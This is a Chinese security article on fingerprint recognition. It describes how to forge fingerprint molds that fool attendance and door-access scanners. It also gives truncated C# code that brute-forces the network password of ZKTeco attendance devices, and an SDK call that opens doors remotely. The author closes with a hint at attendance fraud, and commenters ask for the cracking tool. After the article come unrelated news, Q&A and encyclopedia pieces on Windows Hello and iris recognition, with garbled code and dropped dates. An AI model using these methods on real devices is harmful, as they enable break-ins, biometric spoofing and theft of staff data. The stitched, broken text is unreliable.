生物特征识别之指纹识别，伪造，指纹设备缺陷设计 | WooYun知识库
生物特征识别之指纹识别，伪造，指纹设备缺陷设计
传统安全技术把用户生物信息作为信任对象进行可信计算来当作认证因子，包括对用户进行生物信息模式识别，对目标的生物模式进行密码学计算，对目标进行融合验证计算等。生物信息特征种类繁多，现阶段包括：指纹,人脸,语音等等，间接生物识别包括DNA图谱识别，涉及化验技术才能进行，我们不是法医，这里不做涉及讲解。
0x01 为何要讲解指纹识别？
现代计算机及网络识别基础上的指纹应用还是比较广泛的（从数量上说用指纹识别的比其它一些生物特征识别技术要多，配置指纹识别的单位安全级别不及虹膜识别高），涉及的问题也开始层出不穷，如果未来手机上学苹果一样普及这项技术，移动终端APP收集指纹到服务器可能会有安全问题出现。
0x02 传统指纹识别技术要点
指纹学的历史可以追述到几百年前，1892 年，英国学者高尔顿的《指纹学》（1892），提出了三个影响重大的科学论点：1.指纹终生不变；2.指纹可识别；3.指纹可分类。
亨利氏指纹分类法依照指纹形状将指纹分成斗形纹、箕形纹和弧形纹三大类。
斗形纹又可细分为斗形纹、双箕形纹、囊形纹和杂形纹；
箕形纹可再分为正箕形纹和反箕纹形；
弧形纹也有弧形纹和帐形纹。
美国联邦调查局所管理的指纹数据库名为IAFIS，内容包括4700万组指纹，使用的分类法为八大类型分析法：纹型线;内端及三角;箕形纹内端;箕形纹外端;斗形纹内端;斗形纹外端;追迹线;指纹类型
这里现有的《visual c++指纹模式识别系统算法及实现》为我们做了很好的技术方面的参考。
0x03 指纹识别一般步骤
（1）图像预处理
去躁.滤波等原始图像真实化处理，然后按纹理进行增强处理，然后数字化指纹图像进行细化处理.
（2）指纹特征数字化
数字化指纹端点和纹线分叉点(取指纹纹理上类似线段特征).
（3）特征匹配测量
将指纹端点和叉点集合采集的特征模板与现存的样板进行拓扑结构匹配测量.
0x04 技术的大致实现原理
这里认证技术包括图像处理，特征提取，匹配算法，特征提取又包括Poincare值计算。没有下列图说得这么简单，而且现在设备基本不存图像，而是根据指纹算Key再存储。文章太多写不完，这里标个记，到时候在另起文章写，算法也是可以另写一篇的。
1.指纹先被扫描（光学等）
2.指纹被分析特征点被提取（端点，叉点，中心点及奇异点）
3.指纹特征作为模板存储到指纹数据库
0x05 指纹采集自动化生成工作指纹生成器FPGenerator建立指纹库
有时候做系统测试需要一批指纹样例,一个个采集指纹是很麻烦的事情,这里我们可以直接使用中国科学院自动化研究所的FPGenerator来自动生成我们需要的一些指纹来做指纹数据库样例的工作.
Fingerprint mask generation 上的“Left”，“Right”，“Top”，“Bottom”操作指纹图像左，右，上，下的轮廓。
背景修改：
“none”，“Optical（光学）”，“Scrapping（刮擦）”。
中间过程总共有10步，大家只要遇到需要进行指纹系统试验的情况，可以用它生成采集图像，里面包括了干燥，图像加噪点等功能。
0x06 土办法实现指模提取及复制
有时候没有自动化生成软件情况下,我们需要对方指纹模型或者自己的指纹模型,或者根据窃取来的指纹做一个伪造产品(在犯罪现场留下一个伪造他人的指纹并不是做不到),或者盗窃别人的生物特征指纹,这个不像传统的密码被盗就可以随时修改,被盗走就追不回来了,所以写这篇文章目的在于强调指纹认证系统的数据库安全，当然其它生物特征作为双因子认证的系统同样要注意。
1.实际上提取指纹的材料非常多,做指模的材料可以使用蜡烛,氰基丙烯酸盐粘合剂,胶带纸等。比方下列我可以直接搞到手的东西。
2.关于指模的制作，可以直接选用滴蜡的方式制作指模，比较方便，便于就地随手取材，貌似市面上卖的制作指模的就是这么个办法。当然还有用塑胶产品做还有用橡皮泥做，更多的有取指纹的专业胶带做。
3.成品指模大致上就是下图本大爷指纹的样子，可以过一般的考勤机及光学门禁系统。
0x07 WHY I HACKED TOUCHID Marc Rogers演讲用的PPT中比较有意思的地方
早在2013年的syscan上Marc Rogers就演示过指模绕过苹果iphone的指纹认证，其中PPT的”How Fingerprint Scanners FAIL”部分提到过几点注意的地方
1.指纹扫描仪信任我们在任何物体上触碰留下的证明痕迹
2.如果你能获得并复制指纹特征，你就能实现重放攻击
3.小熊软糖能够在很多系统上实现指纹功能，当然纯明胶效果更好（隆胸等材料）
4.明胶是一种从动物皮肤上提取做成的蛋白质，所以与人体皮肤非常相似
5.明胶被用于指纹重放攻击上并不意外
6.最新的系统也会把这种仿真指纹识别为真指纹
2002年论文Impact of Artificial "Gummy" Fingers on Fingerprint Systems也有提到过几种材料(活体，硅胶，明胶)的对比问题，它们之间纹理差别并不是很大，类似于人体活体指纹一样，能够轻易骗过辨识度不是很高的指纹认证产品。
PPT中详细介绍了指纹提取流程，涉及数码照相，阈值色阶调整，打印，方便用来做指模。如下图所示：
PPT最后的部分“But, What does this mean?”中提到了几个有趣的观点
1.指纹认证并不是最高级别的安全措施,，但是指纹认证是一种方便的安全措施，所以我们常用在考勤,门禁,及手机能产品上
2.街上的贼并不会指纹克隆技术去解锁偷来的iphone手机，他们会重刷系统然后卖掉
3.单独来说，指纹认证不该被用于保护你的银行账户，护照或被偷的机密文档。(其实现在国内基本用于双因子认证补充)
4.门禁及一些老设备识别活体指纹还是有点难度，所以还需要加上一些温感等监测方法，当然用温水加热也许能绕过。
0x08 指纹考勤系统软件设计缺陷，一些好玩的东西
只要能搞定指纹考勤机（其余类型考勤机也同样）,在很大情况下能搞定一家公司的所有人员信息,下面我说一下在研究指纹设备时发现的认证缺陷问题。
这里在软件选型上我找到了规模比较大的中控生物旗下的考勤产品下载，其中有下载量比较大的ZKTime系列的免费版。
介绍里说明几乎支持所有类型的指纹考勤机，指纹门禁及所有同品牌类型的指纹产品类型，如果算连接网络的设备全中国估计会有6位数以上的设备终端。
网站上有一篇“户外物理设备入侵之：入侵并“调教”中控指纹语音考勤系统(打卡机)”,作者只是写了个大概,并没有对程序进行过分析,有些概念是错误的,反正正好我也在研究，重新写一些东西纠正一下好了。
关于此类设备的认证方面网上都有资料可循，不过有些人说是明文，三次握手部分看不到有此类的数据包，所以应该是加密算法做哈希，尤其说过此密码估计要设备终端和PC终端相同才行。（设备默认开启4370端口，6位数字组合为暴力枚举必破）
所以这里设备爆破手法1.搞清密码处理流程用数据包骗过去。2,直接扣二次开发SDK或者找开发资料把函数扣出来。
索性SDK做得简单易懂，我看一天左右就可以上手编写破解密码的程序部分了。
指纹考勤联机部分的流程SDK文档如下：
远程网络认证部分关键函数有两个：
1.Connect_Net
VARIANT_BOOL Connect_Net( [in] BSTR IPAdd, [in] long Portl)
布尔类型的函数
IPAdd,(远程设备IP地址)和Port(设备认证端口)
2.SetCommPassword
VARIANT_BOOL SetCommPassword( [in] long CommKey)
CommKey为密码（小声说一句，可能是为了兼容或者开发方便，认证方式实在很弱）。
整个连接过程不过很短的几句代码，加个循环就能成为破解密码程序:
private void CrackerConnect() {
zkemkeeper.CZKEMClass axCZKEM1 = new zkemkeeper.CZKEMClass();
int ifcommnetpass = 0;
for (j = 0; j & 24; j++) {
key = comkeys[j];
pwd = axCZKEM1.SetCommPassword(key);
if (pwd == true) {
bIsConnected = axCZKEM1.Connect_Net(txtIP.Text, Convert.ToInt32(txtPort.Text));
if (bIsConnected == true) {
btnConnect.BeginInvoke(new System.EventHandler(SetbtnConnectTextSec));
lblState.BeginInvoke(new System.EventHandler(SetlblStateTextSec), comkeystr[j]);
iMachineNumber = 1;//In fact,when you are using the tcp/ip communication,this parameter will be ignored,that is any integer will all right.Here we use 1.
axCZKEM1.RegEvent(iMachineNumber, 65535);//Here you can register the realtime events that you want to be triggered(the parameters 65535 means registering all)
ifcommnetpass = 1;
lblState.BeginInvoke(new System.EventHandler(SetlblStateTextSecfail), comkeystr[j]);
if (ifcommnetpass == 0) {
for (j = 0; j & 1000000; j++) {
key = keys[j];
pwd = axCZKEM1.SetCommPassword(key);
if (pwd == true) {
bIsConnected = axCZKEM1.Connect_Net(txtIP.Text, Convert.ToInt32(txtPort.Text));
if (bIsConnected == true) {
btnConnect.BeginInvoke(new System.EventHandler(SetbtnConnectTextSec));
lblState.BeginInvoke(new System.EventHandler(SetlblStateTextSec), keystr[j]);//
iMachineNumber = 1;//In fact,when you are using the tcp/ip communication,this parameter will be ignored,that is any integer will all right.Here we use 1. //
axCZKEM1.RegEvent(iMachineNumber, 65535);//Here you can register the realtime events that you want to be triggered(the parameters 65535 means registering all)
lblState.BeginInvoke(new System.EventHandler(SetlblStateTextSecfail), keystr[j]);
Cursor = Cursors.D
注意先注册SDK里提供的控件再调用里面的接口函数：
按照SDK开发的专门入侵的程序可以做到远程开关设备和远程清密码，还有开门禁等等。
比方说开门禁的
【函数定义】
VARIANT_BOOL
ACUnlock([in] long dwMachineNumber, [in] long Delay)
开门，使开门控制器输出开门电平，并延迟（Delay/10）秒后关门
dwMachineNumber
开门延迟时间
【返回值】
成功返回True，否则返回False
还有很多功能，比如鸣叫报警，自动开门,下载整个公司数据库，照片指纹等，甚至可以像游戏Watch dog里一样手机开门，手机关门禁和考勤设备，其实考勤及门禁设备也很重要。
大家节后上班考勤难免会有问题，有缘人看这篇文章应该知道咋做了。
参考资料：
《可信云安全管家技术实现》
《WHY I HACKED TOUCHID》Marc Rogers
《TFT 系列脱机通讯开发包开发手册》
&乌云知识库版权所有 未经许可 禁止转载
为您推荐了适合您的技术文章:
@windhawk 我们小区已经可以APP开门禁了！细思极恐。
能教小弟吗？我是做防盗这方面的，可以教学费
求赐教一下，你就是我的如来佛我的Q
求最后那个破解密码的软件啊，
一篇详实的文章。
估计很多人想要这个程序吧。。
受益良多，特别是六一儿童节特别制作的那个东西
搞定后台数据
很有意思的一篇文章 貌似现在很多单位都流行指纹打卡签到和开门禁 如果真的如作者如此可以破解 那么真的是很大的安全隐患 小小地问一句：作者能够让签到机自动指纹签到么？
感谢知乎授权页面模版Windows 10将支持脸部、指纹和虹膜识别技术
[摘要]微软没有披露Windows 10预览版用户何时能用上Windows Hello。
腾讯数码讯（文心）微软希望广大用户了解，密码不是用户登录Windows 10 PC的唯一途径。据Ubergizmo网站报道，微软今天证实，Windows 10支持的其他登录选项包括脸部、指纹和虹膜识别。这一新的生物特征身份识别系统被称作Windows Hello，它可以用于对应用、企业内容和网络体验进行认证，而无需输入密码。由于对这些登录选项的支持整合在Windows 10中，因此无论哪家公司生产的设备都支持这些技术。只要设备包含有脸部、指纹和虹膜识别所要求的硬件，Windows Hello就可以很好地运行。微软还证实，一旦Windows 10今年晚些时候发布后，配置指纹传感器的兼容计算机将支持Windows Hello。微软表示，Windows Hello“综合利用特制硬件和软件”，确保能准确地验证用户身份。这将有助于防止“非法”用户使用计算机。据微软称，Windows Hello将提供企业级的安全性。用户将必须确认使用Windows Hello功能。微软没有披露Windows 10预览版用户何时能用上Windows Hello。微软希望今年晚些时候向消费者发布Windows 10。来源：查报价，看新品，尽在腾讯数码官方微信 扫描左侧二维码即可添加腾讯数码官方微信您也可以在微信上搜索“腾讯数码”或“qqdigi”，获取更多数码资讯。
[责任编辑：shuozhou]
还能输入140字
Copyright & 1998 - 2016 Tencent. All Rights Reserved生物特征是不是也需要集中保存在数据库中？如果是，被黑客偷取了不是就麻烦了？密码偷取了，还可以更改。这个被偷取了，改都没法改。
密码的安全性很大程度上取决于其复杂度，而生物特征信息的复杂度基本是一定的，所以抛开密码复杂度讲很难得出定论。但无论是密码的复杂度，生物特征识别的宽容度，还是加密算法本身，都是在成本与安全性之间的权衡。目前而言，一个足够复杂的密码明文加一个足够优秀的加密算法一定比生物特征识别更安全，但以此带来的便利性的牺牲是否值得，就是另一个问题了。生物特征信息的唯一性确实注定了它更高的泄密风险，所以现在一般不会直接存储生物特征信息，而是对其进行理论不可逆运算后再存储，同时还有活体验证以增加生物特征信息的复制和伪造门槛。
已有帐号？
无法登录？
社交帐号登录您正在使用IE低版浏览器，为了您的雷锋网账号安全和更好的产品体验，强烈建议使用更快更安全的浏览器
当我们还在谈论指纹支付的时候，日本已经开始使用虹膜支付了
2013年，iPhone 5S首次推出系统，可支持Touch ID指纹识别和支付功能。如今越来越多的手机也开始支持指纹支付，不过在我们还在谈论指纹支付的时候，日本说他们的手机已经可以使用虹膜支付了。日本运营商NTT DoCoMo 和富士通近日推出了一款可使用虹膜技术支付的Arrows NX F-04G，据他们称，这是世界上第一款使用虹膜技术的智能手机，可用于解锁和手机钱包的支付，同时还支持指纹识别。这款手机其他的常规参数包括，5.2英寸的QHD屏幕，搭载系统，3GB的RAM以及32GB的内存。富士通在今年3月宣布已开发出能应用于智能手机的虹膜识别技术。这款设备暂时并不会走出日本，不过接下来肯定会有更多厂商会推出相关产品。在今年的Intel IDF（Intel信息技术峰会）上，英特尔的合作伙伴EyeStart与Intel、民生银行和联想合作，推出了EyeSmart一款具有支付功能的虹膜手机，让用户看一眼手机就可以支付鉴权。另外，三星与微软也是虹膜技术的拥趸。早在Galaxy S5 发布之初就已经有传闻称Galaxy S5将采用虹膜识别技术，用以对抗iPhone 5s的指纹识别功能。不过后来这一计划后来并未成行，最后也是采用指纹识别。之后Galaxy Note 4同样传出此类消息，三星官方Twitter也发布推特暗示Note 4将采用虹膜识别技术（下图）。虽然最后依然未能成行，不过三星对于实现虹膜技术的决心从未放弃。今年愚人节前夕，三星宣布正在和SRI Internal（Siri背后的技术公司）合作研发一款内置眼球扫描仪的平板电脑，基于虹膜识别，它的准确性是指纹扫描器的1万倍，是脸部识别的10万倍。微软也曾在3月宣称Windows 10将全面支持面部、指纹和虹膜识别，这一新的生物特征身份识别系统被称作Windows Hello，它可以用于对应用、企业内容和网络体验进行认证，而无需输入密码，前提是设备具有对应的物理硬件。此外，有报道称微软旗下Lumia下一代旗舰机将支持虹膜识别功能。虹膜识别相对指纹识别更加安全，指纹识别的错误率是1：10万，而虹膜识别的错误率则是1：1亿，比指纹识别安全成千上万倍。另外，虹膜的复杂与稳定的结构更加难以被改变，不会受外界因素所干扰。虹膜识别技术目前主要应用在专业领域，面向于银行、政府、机场以及军方等对安全要求极高的机构。在国外某些银行中，已经启用虹膜识别系统，作为客户认证依据，甚至能够实现ATM机无卡取款交易。另外，在军队军械库、国际机场安检、医院婴儿房安全管理以及大学校园的安防系统都能看到虹膜识别使用情景。2015年被称为虹膜手机元年，各大手机和平板电脑都会积极采用这一功能，如此看来，不久我们也可以使用手机进行虹膜支付了。
微信扫一扫，打赏作者吧～
关闭雷锋广告
同步到新浪微博
关注产品和创新的科技媒体
雷锋网编辑，专注机器人无人机报道，创业者或行业交流可加微信号Duras0820
当月热门文章
￥169.00￥399.00
00:00:00后恢复原价
本栏目由提供
为了您的账户安全，请
您的邮箱还未验证,完成可获20积分哟！
您的账号已经绑定，现在您可以以方便用邮箱登录“人脸识别在准确度上略低于指纹或虹膜识别，但是人脸识别最直观、最自然，只需要你正对摄像头这样很简单的交互，所以很容易被用户所接受。”——网易邮箱团队杭州研究院技术总监李晓燕女士
虹膜识别 -
虹膜是人眼瞳孔和眼白之间的环状&组织，是人眼的可视部分。眼睛的外观图由、、三部分构成。巩膜即眼球外围的白色部分，约占总面积的30%；眼睛中心为瞳孔部分，约占5%；虹膜位于巩膜和瞳孔之间，包含了最丰富的纹理信息，占据65%。外观上看，由许多腺窝、皱褶、色素斑等构成，是人体中最独特的结构之一。
虹膜的形成由遗传决定，人体基因表达决定了虹膜的形态、生理、颜色和总的外观。&到二岁左右，虹膜就基本上发育到了足够尺寸，进入了相对稳定的时期。除非极少见的反常状况、身体或精神上大的创伤造成虹膜外观上的改变外，虹膜形貌可以保持数十年没有多少变化。另一方面，虹膜是外部可见的，但同时又属于内部组织，位于角膜后面。要改变虹膜外观，需要非常精细的外科手术，而且要冒着视力损伤的危险。虹膜的高度独特性、稳定性及不可更改的特点，是虹膜可用作身份鉴别的物质基础。
由于虹膜代码（Iris Code）是通过复杂的运算获得的，并能提供数量较多的特征点，所以虹膜识别技术是精确度最高的生物识别技术，具体描述如下：
两个不同的虹膜信息有75%匹配信息的可能性是1:106
等错率：1:1200000
两个不同的虹膜产生相同Iris Dode（虹膜代码）的可能性是1:1052
虹膜识别 -
录入和识别
虹膜的定位可在1秒钟之内完成，产生虹膜代码（Iris Dode）的时间也仅需1秒的时间，数据库的检索时间也很快。虹膜识别技术所采用的算法允许图像质量在某种程度上有所变化。相同的虹膜所产生的Iris Dode（虹膜代码）也有25%的变化，但在识别过程中，这种Iris Dode（虹膜代码）的变化只占整个虹膜代码的10%，它所占代码的比例是相当小。
虹膜识别 -
虹膜识别技术人体虹膜组织的唯一性和稳定性最高、不可改变性和抗欺骗性最强，是最为理想的身份识别依据。唯一性高由信息组合的复杂性决定。同卵双胞胎的虹膜纹理信息不同，同一个人左右眼的虹膜纹理也不相同。稳定性高
虹膜纹理在胎儿7个月时已经形成，出生6—18个月后终身不变，不随年龄、职业、生活方式的变化而变化，不被污染，不会磨损，不因疾病改变纹理结构。
抗欺骗性强
&不能人工仿造或手术仿造他人虹膜组织，使用克隆技术也不能复制。虹膜不留印迹，不会因痕迹残留导致他人非法获取特征信号。
可采集性强
虹膜具有可见外形，可从一定的距离处采集信号，不需用户接触设备，可在无光照情况下进行采集。
虹膜识别 -
日，英国开始对一种先进的保安系统进行测试，新系统可扫描乘客的眼睛，以代替检查乘客的护照。
日，(阿拉伯联合酋长国之一)宣布世界上第一套国家级的基于虹膜识别技术的针对被驱逐的外国人虹膜追踪与国界控制系统开始启用。
日，美机场可能将采用虹膜扫描技术，通过扫描乘客的眼球2秒即可快速识别出6英尺（约为1.83米）之外的人的身份。 2015年，随着虹膜技术的普及和推广，技术成本有所下降，越来越多的虹膜设备厂商开始进军民用市场。EyeStart就是其中一家，与Intel、民生银行和联想合作，推出了EyeSmart全球第一款具有支付功能的虹膜手机，未来还会有更多厂商在虹膜手机、PAD、电脑、以及支持虹膜识别进入的手机客户端上应用这项技术。
为本词条添加和相关影像
互动百科的词条（含所附图片）系由网友上传，如果涉嫌侵权，请与客服联系，我们将按照法律之相关规定及时进行处理。未经许可，禁止商业网站等复制、抓取本站内容；合理使用者，请注明来源于。
登录后使用互动百科的服务，将会得到个性化的提示和帮助，还有机会和专业认证智愿者沟通。
您也可以使用以下网站账号登录：
此词条还可添加&
编辑次数：31次
参与编辑人数：19位
最近更新时间： 15:45:55
贡献光荣榜
扫描二维码用手机浏览词条
保存二维码可印刷到宣传品
扫描二维码用手机浏览词条
保存二维码可印刷到宣传品